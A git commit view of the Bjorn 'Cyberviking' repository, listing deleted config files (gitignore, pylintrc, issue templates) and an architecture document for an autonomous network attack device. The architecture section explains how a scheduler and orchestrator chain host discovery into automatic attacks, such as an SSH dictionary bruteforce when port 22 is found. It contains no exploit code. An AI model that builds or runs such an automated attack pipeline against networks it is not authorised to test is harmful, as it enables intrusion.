2 Commits

Fabien POLLY  eb20b168a6  2026-02-18 22:36:10 +01:00
Add RLUtils class for managing RL/AI dashboard endpoints
- Implemented methods for fetching AI stats, training history, and recent experiences.
- Added functionality to set operation mode (MANUAL, AUTO, AI) with appropriate handling.
- Included helper methods for querying the database and sending JSON responses.
- Integrated model metadata extraction for visualization purposes.

Fabien POLLY  b8a13cc698  2026-01-24 18:06:18 +01:00
wiki test

683 changed files with 53278 additions and 27509 deletions

2
.gitattributes vendored

@@ -1,2 +0,0 @@
*.sh text eol=lf
*.py text eol=lf

15
.github/FUNDING.yml vendored

@@ -1,15 +0,0 @@
# These are supported funding model platforms
#github: # Replace with up to 4 GitHub Sponsors-enabled usernames e.g., [user1, user2]
#patreon: # Replace with a single Patreon username
#open_collective: # Replace with a single Open Collective username
#ko_fi: # Replace with a single Ko-fi username
#tidelift: # Replace with a single Tidelift platform-name/package-name e.g., npm/babel
#community_bridge: # Replace with a single Community Bridge project-name e.g., cloud-foundry
#liberapay: # Replace with a single Liberapay username
#issuehunt: # Replace with a single IssueHunt username
#lfx_crowdfunding: # Replace with a single LFX Crowdfunding project-name e.g., cloud-foundry
#polar: # Replace with a single Polar username
buy_me_a_coffee: infinition
#thanks_dev: # Replace with a single thanks.dev username
#custom: # Replace with up to 4 custom sponsorship URLs e.g., ['link1', 'link2']

View File

@@ -1,34 +0,0 @@
---
name: Bug report
about: Create a report to help us improve
title: ""
labels: ""
assignees: ""
---
**Describe the bug**
A clear and concise description of what the bug is.
**To Reproduce**
Steps to reproduce the behavior:
1. Go to '...'
2. Click on '....'
3. Scroll down to '....'
4. See error
**Expected behavior**
A clear and concise description of what you expected to happen.
**Screenshots**
If applicable, add screenshots to help explain your problem.
**Hardware (please complete the following information):**
- Device: [e.g. iPhone6]
- OS: [e.g. iOS]
- Browser [e.g. chrome, safari]
- Version [e.g. 22]
**Additional context**
Add any other context about the problem here.

View File

@@ -1,11 +0,0 @@
---
# .github/ISSUE_TEMPLATE/config.yml
blank_issues_enabled: false
contact_links:
- name: Bjorn Community Support
url: https://github.com/infinition/bjorn/discussions
about: Please ask and answer questions here.
- name: Bjorn Security Reports
url: https://infinition.github.io/bjorn/SECURITY
about: Please report security vulnerabilities here.

View File

@@ -1,19 +0,0 @@
---
name: Feature request
about: Suggest an idea for this project
title: ""
labels: ""
assignees: ""
---
**Is your feature request related to a problem? Please describe.**
A clear and concise description of what the problem is. Ex. I'm always frustrated when [...]
**Describe the solution you'd like**
A clear and concise description of what you want to happen.
**Describe alternatives you've considered**
A clear and concise description of any alternative solutions or features you've considered.
**Additional context**
Add any other context or screenshots about the feature request here.

View File

@@ -1,12 +0,0 @@
# .github/dependabot.yml
version: 2
updates:
- package-ecosystem: "pip"
directory: "."
schedule:
interval: "weekly"
commit-message:
prefix: "fix(deps)"
open-pull-requests-limit: 5
target-branch: "dev"

137
.gitignore vendored

@@ -1,137 +0,0 @@
# Node.js / npm
node_modules/
npm-debug.log*
yarn-debug.log*
yarn-error.log*
.pnpm-debug.log*
package-lock.json*
# TypeScript / TSX
dist/
*.tsbuildinfo
# Poetry
poetry.lock
# Environment variables
.env
.env.*.local
# Logs
logs
*.log
pnpm-debug.log*
lerna-debug.log*
# Dependency directories
jspm_packages/
# Optional npm cache directory
.npm
# Output of 'npm pack'
*.tgz
# Lockfiles
yarn.lock
.pnpm-lock.yaml
# Optional eslint cache
.eslintcache
# Optional stylelint cache
.stylelintcache
# Optional REPL history
.node_repl_history
# Coverage directory used by tools like istanbul / jest
coverage/
# Output of 'tsc' command
out/
build/
tmp/
temp/
# Python
__pycache__/
*.py[cod]
*.so
*.egg
*.egg-info/
pip-wheel-metadata/
*.pyo
*.pyd
*.whl
*.pytest_cache/
.tox/
env/
venv
venv/
ENV/
env.bak/
.venv/
# mypy
.mypy_cache/
.dmypy.json
dmypy.json
# Pyre type checker
.pyre/
# Coverage reports
htmlcov/
.coverage
.cache
nosetests.xml
coverage.xml
*.cover
*.py,cover
# Jupyter Notebook
.ipynb_checkpoints
# Django stuff:
staticfiles/
local_settings.py
db.sqlite3
db.sqlite3-journal
# Flask stuff:
instance/
.webassets-cache
# VS Code settings
.vscode/
.idea/
# macOS files
.DS_Store
.AppleDouble
.LSOverride
# Windows files
Thumbs.db
ehthumbs.db
Desktop.ini
$RECYCLE.BIN/
# Linux system files
*.swp
*~
# IDE specific
*.iml
*.suo
*.ntvs*
*.njsproj
*.sln
*.sw?
scripts
*/certs/

652
.pylintrc

@@ -1,652 +0,0 @@
[MAIN]
# Analyse import fallback blocks. This can be used to support both Python 2 and
# 3 compatible code, which means that the block might have code that exists
# only in one or another interpreter, leading to false positives when analysed.
analyse-fallback-blocks=no
# Clear in-memory caches upon conclusion of linting. Useful if running pylint
# in a server-like mode.
clear-cache-post-run=no
# Load and enable all available extensions. Use --list-extensions to see a list
# all available extensions.
#enable-all-extensions=
# In error mode, messages with a category besides ERROR or FATAL are
# suppressed, and no reports are done by default. Error mode is compatible with
# disabling specific errors.
#errors-only=
# Always return a 0 (non-error) status code, even if lint errors are found.
# This is primarily useful in continuous integration scripts.
#exit-zero=
# A comma-separated list of package or module names from where C extensions may
# be loaded. Extensions are loading into the active Python interpreter and may
# run arbitrary code.
extension-pkg-allow-list=
# A comma-separated list of package or module names from where C extensions may
# be loaded. Extensions are loading into the active Python interpreter and may
# run arbitrary code. (This is an alternative name to extension-pkg-allow-list
# for backward compatibility.)
extension-pkg-whitelist=
# Return non-zero exit code if any of these messages/categories are detected,
# even if score is above --fail-under value. Syntax same as enable. Messages
# specified are enabled, while categories only check already-enabled messages.
fail-on=
# Specify a score threshold under which the program will exit with error.
fail-under=8
# Interpret the stdin as a python script, whose filename needs to be passed as
# the module_or_package argument.
#from-stdin=
# Files or directories to be skipped. They should be base names, not paths.
ignore=venv,node_modules,scripts
# Add files or directories matching the regular expressions patterns to the
# ignore-list. The regex matches against paths and can be in Posix or Windows
# format. Because '\\' represents the directory delimiter on Windows systems,
# it can't be used as an escape character.
ignore-paths=
# Files or directories matching the regular expression patterns are skipped.
# The regex matches against base names, not paths. The default value ignores
# Emacs file locks
ignore-patterns=^\.#
# List of module names for which member attributes should not be checked and
# will not be imported (useful for modules/projects where namespaces are
# manipulated during runtime and thus existing member attributes cannot be
# deduced by static analysis). It supports qualified module names, as well as
# Unix pattern matching.
ignored-modules=
# Python code to execute, usually for sys.path manipulation such as
# pygtk.require().
#init-hook=
# Use multiple processes to speed up Pylint. Specifying 0 will auto-detect the
# number of processors available to use, and will cap the count on Windows to
# avoid hangs.
jobs=1
# Control the amount of potential inferred values when inferring a single
# object. This can help the performance when dealing with large functions or
# complex, nested conditions.
limit-inference-results=100
# List of plugins (as comma separated values of python module names) to load,
# usually to register additional checkers.
load-plugins=
# Pickle collected data for later comparisons.
persistent=yes
# Resolve imports to .pyi stubs if available. May reduce no-member messages and
# increase not-an-iterable messages.
prefer-stubs=no
# Minimum Python version to use for version dependent checks. Will default to
# the version used to run pylint.
py-version=3.12
# Discover python modules and packages in the file system subtree.
recursive=no
# Add paths to the list of the source roots. Supports globbing patterns. The
# source root is an absolute path or a path relative to the current working
# directory used to determine a package namespace for modules located under the
# source root.
source-roots=
# When enabled, pylint would attempt to guess common misconfiguration and emit
# user-friendly hints instead of false-positive error messages.
suggestion-mode=yes
# Allow loading of arbitrary C extensions. Extensions are imported into the
# active Python interpreter and may run arbitrary code.
unsafe-load-any-extension=no
# In verbose mode, extra non-checker-related info will be displayed.
#verbose=
[BASIC]
# Naming style matching correct argument names.
argument-naming-style=snake_case
# Regular expression matching correct argument names. Overrides argument-
# naming-style. If left empty, argument names will be checked with the set
# naming style.
#argument-rgx=
# Naming style matching correct attribute names.
attr-naming-style=snake_case
# Regular expression matching correct attribute names. Overrides attr-naming-
# style. If left empty, attribute names will be checked with the set naming
# style.
#attr-rgx=
# Bad variable names which should always be refused, separated by a comma.
bad-names=foo,
bar,
baz,
toto,
tutu,
tata
# Bad variable names regexes, separated by a comma. If names match any regex,
# they will always be refused
bad-names-rgxs=
# Naming style matching correct class attribute names.
class-attribute-naming-style=any
# Regular expression matching correct class attribute names. Overrides class-
# attribute-naming-style. If left empty, class attribute names will be checked
# with the set naming style.
#class-attribute-rgx=
# Naming style matching correct class constant names.
class-const-naming-style=UPPER_CASE
# Regular expression matching correct class constant names. Overrides class-
# const-naming-style. If left empty, class constant names will be checked with
# the set naming style.
#class-const-rgx=
# Naming style matching correct class names.
class-naming-style=PascalCase
# Regular expression matching correct class names. Overrides class-naming-
# style. If left empty, class names will be checked with the set naming style.
#class-rgx=
# Naming style matching correct constant names.
const-naming-style=UPPER_CASE
# Regular expression matching correct constant names. Overrides const-naming-
# style. If left empty, constant names will be checked with the set naming
# style.
#const-rgx=
# Minimum line length for functions/classes that require docstrings, shorter
# ones are exempt.
docstring-min-length=-1
# Naming style matching correct function names.
function-naming-style=snake_case
# Regular expression matching correct function names. Overrides function-
# naming-style. If left empty, function names will be checked with the set
# naming style.
#function-rgx=
# Good variable names which should always be accepted, separated by a comma.
good-names=i,
j,
k,
ex,
Run,
_
# Good variable names regexes, separated by a comma. If names match any regex,
# they will always be accepted
good-names-rgxs=
# Include a hint for the correct naming format with invalid-name.
include-naming-hint=no
# Naming style matching correct inline iteration names.
inlinevar-naming-style=any
# Regular expression matching correct inline iteration names. Overrides
# inlinevar-naming-style. If left empty, inline iteration names will be checked
# with the set naming style.
#inlinevar-rgx=
# Naming style matching correct method names.
method-naming-style=snake_case
# Regular expression matching correct method names. Overrides method-naming-
# style. If left empty, method names will be checked with the set naming style.
#method-rgx=
# Naming style matching correct module names.
module-naming-style=snake_case
# Regular expression matching correct module names. Overrides module-naming-
# style. If left empty, module names will be checked with the set naming style.
#module-rgx=
# Colon-delimited sets of names that determine each other's naming style when
# the name regexes allow several styles.
name-group=
# Regular expression which should only match function or class names that do
# not require a docstring.
no-docstring-rgx=^_
# List of decorators that produce properties, such as abc.abstractproperty. Add
# to this list to register other decorators that produce valid properties.
# These decorators are taken in consideration only for invalid-name.
property-classes=abc.abstractproperty
# Regular expression matching correct type alias names. If left empty, type
# alias names will be checked with the set naming style.
#typealias-rgx=
# Regular expression matching correct type variable names. If left empty, type
# variable names will be checked with the set naming style.
#typevar-rgx=
# Naming style matching correct variable names.
variable-naming-style=snake_case
# Regular expression matching correct variable names. Overrides variable-
# naming-style. If left empty, variable names will be checked with the set
# naming style.
variable-rgx=[a-z_][a-z0-9_]{2,30}$
[CLASSES]
# Warn about protected attribute access inside special methods
check-protected-access-in-special-methods=no
# List of method names used to declare (i.e. assign) instance attributes.
defining-attr-methods=__init__,
__new__,
setUp,
asyncSetUp,
__post_init__
# List of member names, which should be excluded from the protected access
# warning.
exclude-protected=_asdict,_fields,_replace,_source,_make,os._exit
# List of valid names for the first argument in a class method.
valid-classmethod-first-arg=cls
# List of valid names for the first argument in a metaclass class method.
valid-metaclass-classmethod-first-arg=mcs
[DESIGN]
# List of regular expressions of class ancestor names to ignore when counting
# public methods (see R0903)
exclude-too-few-public-methods=
# List of qualified class names to ignore when counting class parents (see
# R0901)
ignored-parents=
# Maximum number of arguments for function / method.
max-args=5
# Maximum number of attributes for a class (see R0902).
max-attributes=7
# Maximum number of boolean expressions in an if statement (see R0916).
max-bool-expr=5
# Maximum number of branch for function / method body.
max-branches=12
# Maximum number of locals for function / method body.
max-locals=15
# Maximum number of parents for a class (see R0901).
max-parents=7
# Maximum number of positional arguments for function / method.
max-positional-arguments=5
# Maximum number of public methods for a class (see R0904).
max-public-methods=20
# Maximum number of return / yield for function / method body.
max-returns=6
# Maximum number of statements in function / method body.
max-statements=50
# Minimum number of public methods for a class (see R0903).
min-public-methods=2
[EXCEPTIONS]
# Exceptions that will emit a warning when caught.
overgeneral-exceptions=builtins.BaseException,builtins.Exception
[FORMAT]
# Expected format of line ending, e.g. empty (any line ending), LF or CRLF.
expected-line-ending-format=
# Regexp for a line that is allowed to be longer than the limit.
ignore-long-lines=^\s*(# )?<?https?://\S+>?$
# Number of spaces of indent required inside a hanging or continued line.
indent-after-paren=4
# String used as indentation unit. This is usually " " (4 spaces) or "\t" (1
# tab).
indent-string=' '
# Maximum number of characters on a single line.
max-line-length=100
# Maximum number of lines in a module.
max-module-lines=2500
# Allow the body of a class to be on the same line as the declaration if body
# contains single statement.
single-line-class-stmt=no
# Allow the body of an if to be on the same line as the test if there is no
# else.
single-line-if-stmt=no
[IMPORTS]
# List of modules that can be imported at any level, not just the top level
# one.
allow-any-import-level=
# Allow explicit reexports by alias from a package __init__.
allow-reexport-from-package=no
# Allow wildcard imports from modules that define __all__.
allow-wildcard-with-all=no
# Deprecated modules which should not be used, separated by a comma.
deprecated-modules=
# Output a graph (.gv or any supported image format) of external dependencies
# to the given file (report RP0402 must not be disabled).
ext-import-graph=
# Output a graph (.gv or any supported image format) of all (i.e. internal and
# external) dependencies to the given file (report RP0402 must not be
# disabled).
import-graph=
# Output a graph (.gv or any supported image format) of internal dependencies
# to the given file (report RP0402 must not be disabled).
int-import-graph=
# Force import order to recognize a module as part of the standard
# compatibility libraries.
known-standard-library=
# Force import order to recognize a module as part of a third party library.
known-third-party=enchant
# Couples of modules and preferred modules, separated by a comma.
preferred-modules=
[LOGGING]
# The type of string formatting that logging methods do. `old` means using %
# formatting, `new` is for `{}` formatting.
logging-format-style=new
# Logging modules to check that the string format arguments are in logging
# function parameter format.
logging-modules=logging
[MESSAGES CONTROL]
# Only show warnings with the listed confidence levels. Leave empty to show
# all. Valid levels: HIGH, CONTROL_FLOW, INFERENCE, INFERENCE_FAILURE,
# UNDEFINED.
confidence=HIGH,
CONTROL_FLOW,
INFERENCE,
INFERENCE_FAILURE,
UNDEFINED
# Disable the message, report, category or checker with the given id(s). You
# can either give multiple identifiers separated by comma (,) or put this
# option multiple times (only on the command line, not in the configuration
# file where it should appear only once). You can also use "--disable=all" to
# disable everything first and then re-enable specific checks. For example, if
# you want to run only the similarities checker, you can use "--disable=all
# --enable=similarities". If you want to run only the classes checker, but have
# no Warning level messages displayed, use "--disable=all --enable=classes
# --disable=W".
disable=missing-module-docstring,
invalid-name,
too-few-public-methods,
E1101,
C0115,
duplicate-code,
raise-missing-from,
wrong-import-order,
ungrouped-imports,
reimported,
too-many-locals,
missing-timeout,
broad-exception-caught,
broad-exception-raised,
line-too-long
# Enable the message, report, category or checker with the given id(s). You can
# either give multiple identifier separated by comma (,) or put this option
# multiple time (only on the command line, not in the configuration file where
# it should appear only once). See also the "--disable" option for examples.
#enable=
[METHOD_ARGS]
# List of qualified names (i.e., library.method) which require a timeout
# parameter e.g. 'requests.api.get,requests.api.post'
timeout-methods=requests.api.delete,requests.api.get,requests.api.head,requests.api.options,requests.api.patch,requests.api.post,requests.api.put,requests.api.request
[MISCELLANEOUS]
# List of note tags to take in consideration, separated by a comma.
notes=FIXME,
XXX,
TODO
# Regular expression of note tags to take in consideration.
notes-rgx=
[REFACTORING]
# Maximum number of nested blocks for function / method body
max-nested-blocks=5
# Complete name of functions that never returns. When checking for
# inconsistent-return-statements if a never returning function is called then
# it will be considered as an explicit return statement and no message will be
# printed.
never-returning-functions=sys.exit,argparse.parse_error
# Let 'consider-using-join' be raised when the separator to join on would be
# non-empty (resulting in expected fixes of the type: ``"- " + " -
# ".join(items)``)
suggest-join-with-non-empty-separator=yes
[REPORTS]
# Python expression which should return a score less than or equal to 10. You
# have access to the variables 'fatal', 'error', 'warning', 'refactor',
# 'convention', and 'info' which contain the number of messages in each
# category, as well as 'statement' which is the total number of statements
# analyzed. This score is used by the global evaluation report (RP0004).
evaluation=max(0, 0 if fatal else 10.0 - ((float(5 * error + warning + refactor + convention) / statement) * 10))
# Template used to display messages. This is a python new-style format string
# used to format the message information. See doc for all details.
msg-template=
# Set the output format. Available formats are: text, parseable, colorized,
# json2 (improved json format), json (old json format) and msvs (visual
# studio). You can also give a reporter class, e.g.
# mypackage.mymodule.MyReporterClass.
#output-format=
# Tells whether to display a full report or only the messages.
reports=no
# Activate the evaluation score.
score=yes
[SIMILARITIES]
# Comments are removed from the similarity computation
ignore-comments=yes
# Docstrings are removed from the similarity computation
ignore-docstrings=yes
# Imports are removed from the similarity computation
ignore-imports=yes
# Signatures are removed from the similarity computation
ignore-signatures=yes
# Minimum lines number of a similarity.
min-similarity-lines=4
[SPELLING]
# Limits count of emitted suggestions for spelling mistakes.
max-spelling-suggestions=4
# Spelling dictionary name. No available dictionaries : You need to install
# both the python package and the system dependency for enchant to work.
spelling-dict=
# List of comma separated words that should be considered directives if they
# appear at the beginning of a comment and should not be checked.
spelling-ignore-comment-directives=fmt: on,fmt: off,noqa:,noqa,nosec,isort:skip,mypy:
# List of comma separated words that should not be checked.
spelling-ignore-words=
# A path to a file that contains the private dictionary; one word per line.
spelling-private-dict-file=
# Tells whether to store unknown words to the private dictionary (see the
# --spelling-private-dict-file option) instead of raising a message.
spelling-store-unknown-words=no
[STRING]
# This flag controls whether inconsistent-quotes generates a warning when the
# character used as a quote delimiter is used inconsistently within a module.
check-quote-consistency=no
# This flag controls whether the implicit-str-concat should generate a warning
# on implicit string concatenation in sequences defined over several lines.
check-str-concat-over-line-jumps=no
[TYPECHECK]
# List of decorators that produce context managers, such as
# contextlib.contextmanager. Add to this list to register other decorators that
# produce valid context managers.
contextmanager-decorators=contextlib.contextmanager
# List of members which are set dynamically and missed by pylint inference
# system, and so shouldn't trigger E1101 when accessed. Python regular
# expressions are accepted.
generated-members=
# Tells whether to warn about missing members when the owner of the attribute
# is inferred to be None.
ignore-none=yes
# This flag controls whether pylint should warn about no-member and similar
# checks whenever an opaque object is returned when inferring. The inference
# can return multiple potential results while evaluating a Python object, but
# some branches might not be evaluated, which results in partial inference. In
# that case, it might be useful to still emit no-member and other checks for
# the rest of the inferred objects.
ignore-on-opaque-inference=yes
# List of symbolic message names to ignore for Mixin members.
ignored-checks-for-mixins=no-member,
not-async-context-manager,
not-context-manager,
attribute-defined-outside-init
# List of class names for which member attributes should not be checked (useful
# for classes with dynamically set attributes). This supports the use of
# qualified names.
ignored-classes=optparse.Values,thread._local,_thread._local,argparse.Namespace
# Show a hint with possible names when a member name was not found. The aspect
# of finding the hint is based on edit distance.
missing-member-hint=yes
# The minimum edit distance a name should have in order to be considered a
# similar match for a missing member name.
missing-member-hint-distance=1
# The total number of similar names that should be taken in consideration when
# showing a hint for a missing member.
missing-member-max-choices=1
# Regex pattern to define which classes are considered mixins.
mixin-class-rgx=.*[Mm]ixin
# List of decorators that change the signature of a decorated function.
signature-mutators=
[VARIABLES]
# List of additional names supposed to be defined in builtins. Remember that
# you should avoid defining new builtins when possible.
additional-builtins=
# Tells whether unused global variables should be treated as a violation.
allow-global-unused-variables=yes
# List of names allowed to shadow builtins
allowed-redefined-builtins=
# List of strings which can identify a callback function by name. A callback
# name must start or end with one of those strings.
callbacks=cb_,
_cb
# A regular expression matching the name of dummy variables (i.e. expected to
# not be used).
dummy-variables-rgx=_+$|(_[a-zA-Z0-9_]*[a-zA-Z0-9]+?$)|dummy|^ignored_|^unused_
# Argument names that match this expression will be ignored.
ignored-argument-names=_.*|^ignored_|^unused_
# Tells whether we should check for unused import in __init__ files.
init-import=no
# List of qualified module names which can have objects that can redefine
# builtins.
redefining-builtins-modules=six.moves,past.builtins,future.builtins,builtins,io

View File

@@ -1,148 +0,0 @@
# Bjorn Cyberviking Architecture
This document describes the internal workings of **Bjorn Cyberviking**.
> The architecture is designed to be **modular and asynchronous**, using multi-threading to handle the display, web interface, and cyber-security operations (scanning, attacks) simultaneously.
-----
## 1. High-Level Overview
The system relies on a **"Producer-Consumer"** model orchestrated around shared memory and a central database.
### System Data Flow
* **User / WebUI**: Interacts with the `WebApp`, which uses `WebUtils` to read/write to the **SQLite DB**.
* **Kernel (Main Thread)**: `Bjorn.py` initializes the `SharedData` (global state in RAM).
* **Brain (Logic)**:
* **Scheduler**: Plans actions based on triggers and writes them to the DB.
* **Orchestrator**: Reads the queue from the DB, executes scripts from `/actions`, and updates results in the DB.
* **Output (Display)**: `Display.py` reads the current state from `SharedData` and renders it to the E-Paper Screen.
-----
## 2. Core Components
### 2.1. The Entry Point (`Bjorn.py`)
This is the global conductor.
* **Role**: Initializes components, manages the application lifecycle, and handles stop signals.
* **Workflow**:
1. Loads configuration via `SharedData`.
2. Starts the display thread (`Display`).
3. Starts the web server thread (`WebApp`).
4. **Network Monitor**: As soon as an interface (Wi-Fi/Eth) is active, it starts the **Orchestrator** thread (automatic mode). If the network drops, it can pause the orchestrator.
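The startup order above can be condensed into a small sketch. Everything here is illustrative (the class, method, and thread names are assumptions, not the real `Bjorn.py` API); the point is the conditional start of the Orchestrator:

```python
import threading

class Supervisor:
    """Hypothetical condensation of Bjorn.py's startup order (names illustrative)."""

    def __init__(self):
        self.network_up = threading.Event()  # set when an interface is active
        self.started = []

    def _launch(self, name):
        # Stand-in for the real Display / WebApp / Orchestrator thread targets.
        t = threading.Thread(target=self.started.append, args=(name,), daemon=True)
        t.start()
        t.join()

    def tick(self):
        # Display and web server start unconditionally...
        for name in ("display", "webapp"):
            if name not in self.started:
                self._launch(name)
        # ...but the Orchestrator only runs once a network interface is up.
        if self.network_up.is_set() and "orchestrator" not in self.started:
            self._launch("orchestrator")

sup = Supervisor()
sup.tick()              # no network yet: orchestrator is not started
sup.network_up.set()
sup.tick()              # interface came up: orchestrator joins
```

In the real program the monitor loop would also clear the event and pause the orchestrator when the network drops.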
### 2.2. Central Memory (`shared.py`)
This is the backbone of the program.
* **Role**: Stores the global state of Bjorn, accessible by all threads.
* **Content**:
* **Configuration**: Loaded from the DB (`config`).
* **Runtime State**: Current status (`IDLE`, `SCANNING`...), displayed text, indicators (wifi, bluetooth, battery).
* **Resources**: File paths, fonts, images loaded into RAM.
* **Singleton DB**: A unique instance of `BjornDatabase` to avoid access conflicts.
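A minimal sketch of such a shared-state singleton, assuming (as the text implies) that every thread must see the same instance; the field names here are illustrative:

```python
import threading

class SharedData:
    """Minimal sketch of shared.py's global-state singleton (field names assumed)."""
    _instance = None
    _lock = threading.Lock()

    def __new__(cls):
        with cls._lock:  # guard first construction against racing threads
            if cls._instance is None:
                inst = super().__new__(cls)
                inst.status = "IDLE"   # runtime state read by the display thread
                inst.config = {}       # configuration loaded from the DB
                cls._instance = inst
            return cls._instance

a = SharedData()
b = SharedData()           # same object: a mutation in one thread is visible to all
b.status = "SCANNING"
```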
### 2.3. Persistent Storage (`database.py`)
A facade (wrapper) for **SQLite**.
* **Architecture**: Delegates specific operations to sub-modules (in `db_utils/`) to keep the code clean (e.g., `HostOps`, `QueueOps`, `VulnerabilityOps`).
* **Role**: Ensures persistence of discovered hosts, vulnerabilities, the action queue, and logs.
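The facade pattern described here might look like the following sketch. Only `HostOps` and the table layout are invented for illustration; the delegation structure is what the text describes:

```python
import sqlite3

class HostOps:
    """Per-domain operations class, one of several the facade delegates to."""
    def __init__(self, conn):
        self.conn = conn
        conn.execute("CREATE TABLE IF NOT EXISTS hosts (ip TEXT PRIMARY KEY)")

    def add(self, ip):
        self.conn.execute("INSERT OR IGNORE INTO hosts VALUES (?)", (ip,))

    def all(self):
        return [row[0] for row in self.conn.execute("SELECT ip FROM hosts")]

class BjornDatabase:
    """Facade: owns the connection, exposes grouped operations."""
    def __init__(self, path=":memory:"):
        self.conn = sqlite3.connect(path)
        # The real code would also wire QueueOps, VulnerabilityOps, etc.
        self.hosts = HostOps(self.conn)

db = BjornDatabase()
db.hosts.add("192.168.1.50")
```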
-----
## 3. The Operational Core: Scheduler vs Orchestrator
This is where Bjorn's "intelligence" lies. The system separates **decision** from **action**.
### 3.1. The Scheduler (`action_scheduler.py`)
*It "thinks" but does not act.*
* **Role**: Analyzes the environment and populates the queue (`action_queue`).
* **Logic**:
* It loops regularly to check **Triggers** defined in actions (e.g., `on_new_host`, `on_open_port:80`, `on_interval:600`).
* If a condition is met (e.g., a new PC is discovered), it inserts the corresponding action into the database with the status `pending`.
* It manages priorities and avoids duplicates.
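The trigger-matching loop can be sketched as follows. The trigger strings use the syntax quoted above (`on_open_port:<n>`); the action names and dict shapes are placeholders, not the real schema:

```python
# Hypothetical action registry: name -> trigger string.
ACTIONS = {
    "SSHBruteforce": "on_open_port:22",
    "WebEnum": "on_open_port:80",
}

def schedule(event, queue):
    """Queue every action whose trigger matches the event, avoiding duplicates."""
    for name, trigger in ACTIONS.items():
        already_queued = any(entry["action"] == name for entry in queue)
        if trigger == event and not already_queued:
            queue.append({"action": name, "status": "pending"})

queue = []
schedule("on_open_port:22", queue)   # new host with SSH open
schedule("on_open_port:22", queue)   # same event again: duplicate is skipped
```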
### 3.2. The Orchestrator (`orchestrator.py`)
*It acts but does not deliberate on strategic consequences.*
* **Role**: Consumes the queue.
* **Logic**:
1. Requests the next priority action (`pending`) from the DB.
2. Dynamically loads the corresponding Python module from the `/actions` folder (via `importlib`).
3. Executes the `run()` or `execute()` method of the action.
4. Updates the result (`success`/`failed`) in the DB.
5. Updates the status displayed on the screen (via `SharedData`).
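The dynamic-loading step (2 and 3 above) can be demonstrated with `importlib`. The module and entry names below are fabricated so the sketch is self-contained; only the load-then-call pattern reflects the text:

```python
import importlib
import sys
import types

# Register a fake actions module so the example runs without the real /actions folder.
fake = types.ModuleType("actions.ping_sweep")
fake.run = lambda target: "success"
sys.modules["actions.ping_sweep"] = fake

def execute(entry):
    """Load the action module by name and call its run()/execute() entry point."""
    module = importlib.import_module(f"actions.{entry['module']}")
    runner = getattr(module, "run", None) or getattr(module, "execute")
    entry["status"] = runner(entry["target"])
    return entry

result = execute({"module": "ping_sweep", "target": "192.168.1.50",
                  "status": "pending"})
```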
-----
## 4. User Interface
### 4.1. E-Ink Display (`display.py` & `epd_manager.py`)
* **EPD Manager**: `epd_manager.py` is a singleton handling low-level hardware access (SPI) to prevent conflicts and manage hardware timeouts.
* **Rendering**: `display.py` constructs the image in memory (**PIL**) by assembling:
* Bjorn's face (based on current status).
* Statistics (skulls, lightning bolts, coins).
* The "catchphrase" (generated by `comment.py`).
* **Optimization**: Uses partial refresh to avoid black/white flashing, except for periodic maintenance.
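The partial-vs-full refresh decision reduces to a periodic counter check. The interval of 50 frames below is an assumed value, not taken from the source:

```python
def needs_full_refresh(frame_count, interval=50):
    """Force a periodic full (flashing) refresh to clear e-ink ghosting."""
    return frame_count % interval == 0

# 100 frames: almost all partial, with the occasional maintenance flash.
refreshes = ["full" if needs_full_refresh(n) else "partial" for n in range(1, 101)]
```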
### 4.2. Web Interface (`webapp.py`)
* **Server**: A custom multi-threaded `http.server` (no heavy framework like Flask or Django, keeping the footprint small).
* **Architecture**:
* API requests are dynamically routed to `WebUtils` (`utils.py`).
* The frontend communicates primarily in **JSON**.
* Handles authentication and GZIP compression of assets.
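The dynamic routing to `WebUtils` can be sketched as name-based dispatch. The `api_status` handler and the `/api/<name>` convention are assumptions for illustration, not the actual routes in `utils.py`:

```python
import json

class WebUtils:
    """Illustrative handler collection; the real method names live in utils.py."""
    def api_status(self, params):
        return {"status": "IDLE"}

def route(path, utils):
    """Resolve /api/<name> to a WebUtils method and return (status, JSON body)."""
    name = "api_" + path.strip("/").split("/")[-1]
    handler = getattr(utils, name, None)
    if handler is None:
        return 404, json.dumps({"error": "not found"})
    return 200, json.dumps(handler({}))

code, body = route("/api/status", WebUtils())
```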
### 4.3. The Commentator (`comment.py`)
Provides Bjorn's personality. It selects phrases from the database based on context (e.g., *"Bruteforcing SSH..."*) and the configured language, with a weighting and delay system to avoid spamming.
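A weighted pick with an anti-spam delay might look like this sketch; the phrases, weights, and 30-second delay are invented examples:

```python
import random
import time

PHRASES = {"SCANNING": [("Sniffing the network...", 3), ("Fresh prey ahead!", 1)]}

class Commentator:
    """Weighted phrase picker with a minimum delay between comments (values assumed)."""
    def __init__(self, min_delay=30.0):
        self.min_delay = min_delay
        self.last_time = -float("inf")

    def comment(self, status, now=None):
        now = time.monotonic() if now is None else now
        if now - self.last_time < self.min_delay:
            return None  # too soon: avoid spamming the screen
        self.last_time = now
        phrases, weights = zip(*PHRASES.get(status, [("...", 1)]))
        return random.choices(phrases, weights=weights, k=1)[0]

c = Commentator()
first = c.comment("SCANNING", now=0.0)
second = c.comment("SCANNING", now=10.0)  # still inside the delay window
```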
-----
## 5. Typical Data Flow (Example)
Here is what happens when Bjorn identifies a vulnerable service:
1. **Scanning (Action)**: The Orchestrator executes a scan. It discovers IP `192.168.1.50` has **port 22 (SSH) open**.
2. **Storage**: The scanner saves the host and port status to the DB.
3. **Reaction (Scheduler)**: In the next cycle, the `ActionScheduler` detects the open port. It checks actions that have the `on_open_port:22` trigger.
4. **Planning**: It adds the `SSHBruteforce` action to the `action_queue` for this IP.
5. **Execution (Orchestrator)**: The Orchestrator finishes its current task, sees the `SSHBruteforce` in the queue, picks it up, and starts the dictionary attack.
6. **Feedback (Display)**: `SharedData` is updated. The screen displays *"Cracking 192.168.1.50"* with the corresponding face.
7. **Web**: The user sees the attack attempt and real-time logs on the web dashboard.
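Steps 1 through 5 can be compressed into a toy pipeline. Everything here (dict-as-database, function names) is a stand-in for the real DB and threads; only the hand-off order mirrors the flow above:

```python
# End-to-end sketch of steps 1-5 (all names illustrative).
db = {"hosts": [], "queue": []}

def on_scan_result(ip, open_ports):
    db["hosts"].append({"ip": ip, "ports": open_ports})       # 2. storage
    for port in open_ports:                                   # 3. reaction
        if port == 22:                                        #    on_open_port:22
            db["queue"].append({"action": "SSHBruteforce",    # 4. planning
                                "target": ip, "status": "pending"})

def orchestrator_step():
    for entry in db["queue"]:                                 # 5. execution
        if entry["status"] == "pending":
            entry["status"] = "running"
            return entry
    return None

on_scan_result("192.168.1.50", [22, 80])
picked = orchestrator_step()
```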
-----
## 6. Folder Structure
Although not provided here, the architecture implies this structure:
```text
/
